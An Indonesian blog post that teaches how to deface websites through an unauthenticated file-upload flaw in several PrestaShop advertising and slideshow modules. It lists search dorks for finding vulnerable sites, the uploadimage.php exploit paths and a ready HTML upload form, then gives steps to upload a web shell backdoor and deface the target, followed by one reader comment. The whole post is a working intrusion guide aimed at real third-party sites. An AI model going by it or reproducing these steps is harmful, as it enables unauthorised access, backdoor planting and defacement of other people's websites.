Uncategories Deface Teknik Prestashop File Upload

Deface Teknik Prestashop File Upload

6/24/2016 02:47:00 AM 1 Comment
Hallo Guys , Gua Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v

Dork : 
   Inurl:/modules/columnadverts/
   Inurl:/modules/homepageadvertise/
   Inurl:/modules/productpageadverts/
   Inurl:/modules/simpleslideshow/

Exploit
 http://loclahost/ modules/columnadverts/uploadimage.php
 http://localhost/ modules/homepageadvertise/uploadimage.php
 http://localhost/ /modules/productpageadverts/uploadimage.php
 http://localhost/ /modules/simpleslideshow/uploadimage.php

CSRF : 
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>


Langsung Ke Tutorialnya.... :*

1. Cari Target Menggunakan Dork !

2. Pilih Salah Satu Situs Yang Ingin Di cRooTz   :v

3. Tambakan Exploit Setelah Url   :*
 http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !

4. Copy CSRF Yang Ada Di Atas Tadi   :*
Jangan Lupa Edit Dulu CSRF Tersebut .
 Localhost   >  Website Target .
 Modules Name   >   Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML   > All Files

5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu   :*
Jika Berhasil Akan Terlihat Seperti Ini


6. Dan Sekarang Lihat Letak Shell Nya
 http://localhost/modules/modules name/slides/Nama_Shell.php

Kalau Sudah Ketemu Shellnya , Terserah Deh , Mau Deface Apanya Aja Bebas :*
Terima Kasih!

SHARE THIS
Unknown

Author:

Previous Post
Next Post
Unknown
4 Jul 2016, 20.36.00

kook di search dork nya malah keluar cara pretashop nya ?? bukan web vuln ?? cara nya gmn ?

Reply
avatar
Langganan: Posting Komentar (Atom)